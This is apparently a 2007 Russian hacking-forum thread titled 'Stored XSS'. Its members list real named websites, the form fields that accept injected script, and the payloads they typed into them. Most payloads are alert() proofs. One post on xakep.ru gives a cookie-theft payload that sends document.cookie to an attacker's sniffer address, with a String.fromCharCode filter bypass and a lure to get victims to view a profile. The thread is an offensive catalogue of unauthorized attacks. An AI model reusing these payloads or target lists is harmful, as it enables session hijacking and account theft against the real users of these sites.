Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

  1. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    200
    Likes Received:
    677
    Reputations:
    333
    Хэк в индексе=) поле Адрес сайта
    http://hackyou.ru/
    описание тут
     
    1 person likes this.
  2. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    189
    Likes Received:
    356
    Reputations:
    109
    www.web-hack.ru

    www.web-hack.ru --> добавить новость

    Вбиваем все данные на фонарь кроме кода, его вводим правильно. В саму новость(textarea) пишем:
    Code:
    <script>alert(document.cookie)</script>
    и жмем кнопочку добавить (Аdd)

    ps Как выяснилось, она является активной.
     
    2 people like this.
  3. Isis

    Isis Мафиозя //хекед :D

    Joined:
    20 Nov 2006
    Messages:
    3,484
    Likes Received:
    1,206
    Reputations:
    252
    www.wikiupload.com
    Заливаем любой файл...в описание пишем
    Code:
    '"><script>alert(/xss/)</script>
    Кнопочку "upload" жмем...
    Выдается 2 ссылки, одна на скачку, другая на комментарии файла..
    Идем в каменты и видим хсс
    Пример
    Code:
    http://www.wikiupload.com/comment.php?id=158669
     
  4. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    431
    Likes Received:
    126
    Reputations:
    4
    chatcity.ru

    Ну вообщем то........вроде чаты на chatcity


    Поля:
    E-mail
    web-страничка

    Вот один пример на volchat.ru
    Code:
    http://volchat.ru/people/pp0.cgi?c=13397&cn=trane___
     
  5. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    416
    Likes Received:
    243
    Reputations:
    145
    narod.yandex.ru

    Пишем письмо в сообщество, уязвимо поле "Ваш сайт:"

    <script>alert('123');</script>
     
    #65 freddi, 14 Jun 2007
    Last edited: 16 Jun 2007
    3 people like this.
  6. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    416
    Likes Received:
    243
    Reputations:
    145
    nm.ru

    прикрепляем к письму файл txt или pdf со скриптом.
     
    1 person likes this.
  7. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    416
    Likes Received:
    243
    Reputations:
    145
    www.xyligan.ru

    уязвимо поле "имя"))))

    зы это из компании Хакера
    ззы пассивных там полно.
     
    1 person likes this.
  8. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    416
    Likes Received:
    243
    Reputations:
    145
    www.xakep.ru

    хсс в чате

    уязвимо любое поле, но только одно, там нет ограничения на кол-во символов, но стоит фильтрация символов:
    " ? +
    это можно спокойно обойти через String.fromCharCode()
    сам код идет в виде

    "onmouseover="navigate('адрес_снифера'.concat(document.cookie))"
    или просто
    "onmouseover="alert('xss')"

    кодируем
    navigate('адрес_снифера'.concat(document.cookie))
    с помощью http://ha.ckers.org/xss.html
    получится примерно

    и пишем в виде

    "onmouseover="String.fromCharCode(то что закодировали)"

    ну чтоб все заработало там ставится галка "Допустить других к просмотру профайла" и говорим посмотрите мой профиль вот так)

    зы спс DimOnOID за небольшую помощь)
     
    #68 freddi, 17 Jun 2007
    Last edited: 19 Jun 2007
    6 people like this.
  9. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    www.panvasoft.com
    Весьма популярный,посещаемый сайт.
    потставляем "><script>alert()</script> во все поля в коментариях.

    Пример:http://panvasoft.com/rus/11970/gb/


    www.hpclub.ru
    Добавление комментарий
    "><script>alert()</script>

    Пример:http://www.hpclub.ru/news.php3?cID=4

    www.consultclub.biz

    Добавление комментарий
    "><script>alert()</script>[/B]
     
    #69 V.I.P, 28 Jun 2007
    Last edited: 28 Jun 2007
    2 people like this.
  10. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    285
    Likes Received:
    597
    Reputations:
    514
    www.lektravi.ru
    Интернет магазин Лекарственные травы
    Травки не желаете....=)
    Активка в гостевой, при добавлении сообщения в поле почта пишем
    Code:
    '><script>alert("ShaDow");</script>
    пример
     
    1 person likes this.
  11. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    www.internet.ru

    Уязвимые поля: "Ваше имя";"Тема".
    Добавление комментарий: <script>alert()</script>

    Пример: http://www.internet.ru/news/2007-06-17409#comment-16117
     
    #71 V.I.P, 6 Jul 2007
    Last edited: 6 Jul 2007
  12. Elvis000

    Elvis000 Патриот

    Joined:
    23 Apr 2007
    Messages:
    607
    Likes Received:
    333
    Reputations:
    148
    англииская газетенка

    http://www.accringtonobserver.co.uk/news/comments/form.html?story_id=230456
     
  13. mister

    mister Elder - Старейшина

    Joined:
    24 Jul 2007
    Messages:
    30
    Likes Received:
    16
    Reputations:
    4
    nm.ru
    http://www4.nm.ru/users/reg.dhtml?__post=1&login=asdasdasdasd&domain=<script>alert()</script>&passwd=asd&pass2=asd&quest_helper=&quest=&answ=
    это пассивная xss.
    чтобы сделать ее активной, пишем html-мессагу и подключаем xss через ифрейм.
     
  14. Isis

    Isis Мафиозя //хекед :D

    Joined:
    20 Nov 2006
    Messages:
    3,484
    Likes Received:
    1,206
    Reputations:
    252
    http://www.hotfile.ru
    Закачиваем файл любой, в поле "Описание" суем наш зловредный код.
    В данном случае
    Code:
    '"/><script>alert(/xss/)</script>
    Получаем линк на скачивание, смотрим - активная хсс
    Пример - http://www.hotfile.ru/52377/

    http://meetfile.com
    Зарегистрировались, заходим в профиль, изменяем его..
    Уязвимы все поля...
    Code:
    '"/><script>alert(/xss/)</script>
     
    #74 Isis, 2 Aug 2007
    Last edited: 2 Aug 2007
  15. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    416
    Likes Received:
    243
    Reputations:
    145
    dump.ru
    уязвимо поле "Tags:" при заливке файла.
     
    1 person likes this.
  16. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    285
    Likes Received:
    597
    Reputations:
    514
    Дневник на sestrenka.ru
    Заводим дневник->постим сообщение в виде хтмл->собираем куки =)
    пример
     
  17. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    234
    Likes Received:
    433
    Reputations:
    287
    http://www.fos.ru/
    Заходим в гостевую книгу, нажимаем создать новое сообщение и пишем:
    Code:
    '><script>alert('xss')</script>
    уязвимы все поля
     
  18. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    234
    Likes Received:
    433
    Reputations:
    287
    http://provodka.ru/news.php?part=3&id=7545
    Оставляем комментарий такого содержания:
    Code:
    "/><script>alert(/xss/)</script>
    уязвимы оба поля
     
    1 person likes this.
  19. n3m0

    n3m0 Elder - Старейшина

    Joined:
    11 May 2007
    Messages:
    136
    Likes Received:
    92
    Reputations:
    11
    1. Сервис загрузки файлов на сервер http://ifile.kiev.ua/
    В поле "ОПИСАНИЕ" пишем
    Code:
    '"/><script>alert(/xss/)</script>
    
    Пример http://ifile.kiev.ua/download_file/618/

    2. Сервис загрузки файлов на сервер http://www.sendfiles.com.ua
    После загрузки файла, в описании пишем
    Code:
    '><script>alert(/xss/)</script>
    
    Пример http://www.sendfiles.com.ua/24431


    UPD
    тут же: При добавлении коментария, пишем в поле "Отзыв"
    Code:
    <script>alert(/xss/)</script>
    
     
    #79 n3m0, 30 Aug 2007
    Last edited: 30 Aug 2007
  20. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    234
    Likes Received:
    433
    Reputations:
    287
    http://www.skoda-russia.ru/resume.php
    Оставляем комментарий такого вида:
    Code:
    "><font color=red onmouseover=javascript:alert('xss')>алерт работает!</font>
     
Loading...
Similar Threads - Хранимые
  1. 4upakabr0
    Replies:
    3
    Views:
    1,776